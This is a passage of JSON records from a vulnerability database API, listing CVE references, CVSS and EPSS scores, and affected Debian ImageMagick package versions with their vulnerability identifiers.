"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1726104", "reference_id": "1726104", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1726104" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=932079", "reference_id": "932079", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=932079" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2020:1180", "reference_id": "RHSA-2020:1180", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2020:1180" }, { "reference_url": "https://usn.ubuntu.com/4192-1/", "reference_id": "USN-4192-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4192-1/" }, { "reference_url": "https://usn.ubuntu.com/7053-1/", "reference_id": "USN-7053-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7053-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-13135" ], "risk_score": 3.4, "exploitability": "0.5", "weighted_severity": "6.7", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-rvjq-uks4-x3h3" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82459?format=api", "vulnerability_id": "VCID-rzge-64xp-bfej", "summary": "imagemagick: use of uninitialised value in function WriteJP2Image in coders/jp2.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-12977.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-12977.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00292", "scoring_system": "epss", "scoring_elements": "0.5255", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00292", "scoring_system": "epss", "scoring_elements": "0.52599", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00292", "scoring_system": "epss", "scoring_elements": "0.52583", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00292", "scoring_system": "epss", "scoring_elements": "0.52568", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00292", "scoring_system": "epss", "scoring_elements": "0.52607", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00292", "scoring_system": "epss", "scoring_elements": "0.52614", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00292", "scoring_system": "epss", "scoring_elements": "0.526", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00298", "scoring_system": "epss", "scoring_elements": "0.53116", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00298", "scoring_system": "epss", "scoring_elements": "0.53129", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00298", "scoring_system": "epss", "scoring_elements": "0.53093", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00298", "scoring_system": "epss", "scoring_elements": "0.53066", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00298", "scoring_system": "epss", "scoring_elements": "0.53085", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00298", "scoring_system": "epss", "scoring_elements": "0.53136", "published_at": "2026-04-08T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { 